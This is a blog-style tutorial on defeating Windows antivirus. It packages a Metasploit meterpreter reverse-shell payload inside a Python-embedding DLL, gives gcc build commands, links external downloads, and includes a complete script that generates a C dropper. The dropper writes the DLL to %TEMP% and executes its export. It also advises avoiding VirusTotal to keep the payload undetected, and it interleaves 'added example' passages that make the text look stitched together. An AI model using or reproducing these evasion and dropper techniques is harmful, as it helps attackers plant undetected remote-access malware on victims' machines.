Hello readers!
Lately I have been interested in AV evasion and I have learned a lot about how antivirus software works; here I will write about my technique for evading every AV product.
Many Windows users think that an antivirus can stop any threat and that, with an AV installed, their computer is secure. This idea is false: new, more advanced malware is written every day and goes undetected by any antivirus for a while.
How does an antivirus work?
An AV has two scanning techniques:
– Static analysis, also called 'signature-based analysis': the antivirus compares the scanned file against its database of known malware, using file hashes (md5/sha1) and byte patterns taken from known samples. If the file matches a signature it is moved to the AV's quarantine. A whole-file hash changes as soon as a single byte of the file changes, so in practice most signatures are byte patterns rather than plain hashes.
– Dynamic analysis, also called 'runtime analysis': once the program is executed, if it was not caught by a signature, the antivirus tries to detect malicious actions at run time, such as decrypting a payload in memory, and plenty of others.
Another type of protection is the AV sandbox: when the user suspects a file of being malware, it can be launched inside the AV's sandbox, without internet access and with restricted resources. A sandbox is similar in spirit to a Docker container on Linux: it runs the file without 'infecting' the real system.
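To make the static part of that explanation concrete, here is an added example in Python (not code from the original post): a toy scanner with one hash signature and one byte-pattern signature, run over a constructed fake sample. The sample, the patterns and the single-byte XOR used to hide the pattern are all made up for the demo.

```python
# Added example (not from the original post): a toy signature scanner that
# shows the difference between hash-based and byte-pattern-based static
# detection, and why a payload that is only decoded at run time escapes both.
import hashlib

# Constructed sample "malware": a fake binary containing a recognisable byte
# sequence that a vendor could write a signature for.
KNOWN_BAD = b"MZ\x90\x00" + b"\x00" * 16 + b"cmd.exe /c whoami" + b"\x00" * 8

# Static "database": exact file hashes and short byte patterns.
HASH_DB = {hashlib.sha1(KNOWN_BAD).hexdigest()}
PATTERN_DB = [b"cmd.exe /c whoami"]


def hash_scan(sample):
    """Signature match on the whole-file hash: any change to the file defeats it."""
    return hashlib.sha1(sample).hexdigest() in HASH_DB


def pattern_scan(sample):
    """Signature match on a byte pattern found anywhere in the file."""
    return any(p in sample for p in PATTERN_DB)


def xor(data, key):
    """Single-byte XOR, standing in for whatever encoding hides the pattern on disk."""
    return bytes(bytearray(b ^ key for b in bytearray(data)))


def scan(sample):
    """Return (hash_hit, pattern_hit) for a sample, as a purely static AV would."""
    return hash_scan(sample), pattern_scan(sample)


def run_demo():
    """Run the three cases a static scanner faces and report what it sees."""
    # 1. the identical file: both static checks fire
    original = KNOWN_BAD
    # 2. one byte appended: the hash changes, the pattern is still present
    appended = KNOWN_BAD + b"\x00"
    # 3. the pattern stored XOR-encoded and only decoded in memory: both static
    #    checks miss; only a runtime check that sees the decoded buffer works
    secret = b"cmd.exe /c whoami"
    encoded = KNOWN_BAD.replace(secret, xor(secret, 0x41))
    decoded_in_memory = xor(xor(secret, 0x41), 0x41)
    return {
        "original": scan(original),
        "appended": scan(appended),
        "encoded": scan(encoded),
        "runtime_sees_pattern": pattern_scan(decoded_in_memory),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, result)
```

The third case is the one this article is really about: the static engines never see the decoded bytes, so detection has to come from the runtime side, which is why the author's later results are measured against scanners that run the sample rather than just hash it.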
What do you need to follow this writeup?
– A main OS with the Metasploit Framework installed.
– A Windows virtual machine with an antivirus product installed (mine is Kaspersky Free 2016), MinGW with gcc.exe, and Python 2.7.
In this writeup I will use Metasploit payloads as the test executables to evade AV.
Msfvenom is the payload generator of the Metasploit Framework. Payloads generated by msfvenom are standalone and quite good for pentesting, but they are detected by most AV products (see the results from an online AV scanner for a plain meterpreter reverse shell payload).
My idea about antivirus evasion
I tried many techniques to obtain a FUD executable, but none of them worked:
– Writing a Metasploit payload encoder in Ruby to obfuscate the malicious code of the payload. After some research I realised that the purpose of an MSF encoder is to avoid bad characters such as \x00, not to evade AV software.
– Generating the payload in an interpreted language (.py, .vbs, .pl) and then compiling it to an executable.
Finally, I had a great idea: since Metasploit has Python meterpreter payloads, I wanted to embed the Python payload in a C program using the Python development libraries (Python.h) and then compile it into a Windows executable. With this technique I got 1/37 on the NoDistribute online scanner.
I wanted a fully undetectable result, so I tried to create a malicious dynamic library with the Python payload embedded, and finally got a fully undetectable payload 🙂
We can check the exported functions of the malicious dynamic library I created!
We run the malicious function of the DLL!
And BOOM, we get a meterpreter session on our side 🙂!
How to create a DLL with the Python payload embedded?
Here you can get the C source code of the DLL: https://pastebin.com/Q5ipn81s . To compile the DLL you need the Python development headers, and you also need libpython27.a (the MinGW import library for python27.dll) http://www58.zippyshare.com/v/pzoNUkGd/file.html , which you move into C:\Python27\libs\ . Note that an import library does not copy the interpreter into your DLL: the machine that runs the DLL still needs a Python 2.7 installation (python27.dll and its standard library).
gcc.exe malicious_dll.c -IC:\Python27\include -LC:\Python27\libs -lpython27 -shared -o payload.dll
-shared = tells gcc that the output is a shared (dynamic) library
-I = tells gcc where Python.h is located
-o = the output file
-L = tells gcc where the Python interpreter library is located
-l = the name of the Python interpreter library (gcc turns -lpython27 into libpython27.a)
We have our malicious dynamic library, but the problem is how to deliver it during a pentest: we would need a .bat file or an .exe to call the malicious DLL, so how do we distribute the two files?
To solve the problem, I created a Python program that hardcodes the bytes of the DLL in a character variable, writes them to a new DLL file, and then calls the function of the DLL, so the payload is standalone: https://github.com/Hadi999/MyTools/blob/master/bypass-av.py !
In our case we need to call the function 'payload' of payload.dll, so the command is
python bypass-av.py --library=payload.dll --function=payload --output=standalone_payload.c
We compile it on our Windows machine:
gcc.exe standalone_payload.c -o standalone_payload.exe
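As an added example (my own code, not the author's bypass-av.py and not from the original post), here is a Python script that does the same job: it reads a DLL, emits a C source file with the DLL bytes hardcoded, and the generated program drops the DLL into %TEMP%, loads it with LoadLibraryA and calls the named export looked up with GetProcAddress. The script name embed_dll.py, the drop location and the assumption that the export has the signature void f(void) are mine.

```python
# Added example (my own code, not the author's bypass-av.py): turn a DLL into a
# standalone C "dropper" source. The generated program carries the DLL bytes in
# a char array, writes them to %TEMP% at run time, loads the file with
# LoadLibraryA and calls one exported function found with GetProcAddress.
# Assumption: the export takes no arguments and returns nothing.
import os
import sys

C_TEMPLATE = r'''#include <windows.h>
#include <stdio.h>

/* the embedded DLL, {length} bytes */
static const unsigned char dll_bytes[] = {{
    {array}
}};
static const size_t dll_len = {length};

int main(void)
{{
    char tmp[MAX_PATH];
    char path[MAX_PATH];
    FILE *f;
    HMODULE h;
    FARPROC fn;

    /* GetTempPathA returns the directory with a trailing backslash */
    if (GetTempPathA(MAX_PATH, tmp) == 0)
        return 1;
    snprintf(path, sizeof(path), "%s{dll_name}", tmp);

    f = fopen(path, "wb");
    if (f == NULL)
        return 1;
    if (fwrite(dll_bytes, 1, dll_len, f) != dll_len) {{
        fclose(f);
        return 1;
    }}
    fclose(f);

    h = LoadLibraryA(path);
    if (h == NULL)
        return 1;
    fn = GetProcAddress(h, "{function}");
    if (fn == NULL)
        return 1;
    ((void (*)(void))fn)();   /* assumed signature: void {function}(void) */
    return 0;
}}
'''


def to_c_array(data, per_line=12):
    """Render bytes as a C initializer list, one hex literal per byte."""
    rows = []
    for i in range(0, len(data), per_line):
        chunk = bytearray(data[i:i + per_line])
        rows.append(", ".join("0x%02x" % b for b in chunk))
    return ",\n    ".join(rows)


def generate_dropper(dll_bytes, function, dll_name):
    """Return C source for a dropper that embeds dll_bytes and calls `function`."""
    if len(dll_bytes) == 0:
        raise ValueError("empty DLL")
    return C_TEMPLATE.format(array=to_c_array(dll_bytes),
                             length=len(dll_bytes),
                             dll_name=dll_name,
                             function=function)


def build_from_file(library, function, output):
    """Read `library`, write the generated C source to `output`, return the DLL size."""
    with open(library, "rb") as fh:
        data = fh.read()
    with open(output, "w") as fh:
        fh.write(generate_dropper(data, function, os.path.basename(library)))
    return len(data)


if __name__ == "__main__":
    # usage: python embed_dll.py payload.dll payload standalone_payload.c
    if len(sys.argv) != 4:
        sys.exit("usage: embed_dll.py <dll> <export> <output.c>")
    n = build_from_file(sys.argv[1], sys.argv[2], sys.argv[3])
    print("embedded %d bytes into %s" % (n, sys.argv[3]))
```

The output compiles with the same gcc.exe standalone_payload.c -o standalone_payload.exe command as above. Before generating, confirm the export name on the build VM with objdump -p payload.dll (the MinGW toolchain ships it), since GetProcAddress fails silently on a typo. Two caveats worth keeping in mind: the DLL bytes sit unchanged inside the .exe, so anything that matched the DLL statically will match the dropper too, and "write a DLL to %TEMP% then load it" is exactly the drop-and-load behaviour that runtime analysis watches for.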
Argh, 1/38 for our standalone executable, but the only AV that detects it is ClamAV, which is a Unix antivirus: our payload is for Windows, so our executable is fully undetectable!!! If you want 0/37 you can distribute only the malicious DLL and a batch file that calls it. That is the end of the article, I hope you liked it 🙂
Note: please do not scan the samples with an online scanner like VirusTotal, because they share results with AV vendors and our payload will not be FUD anymore.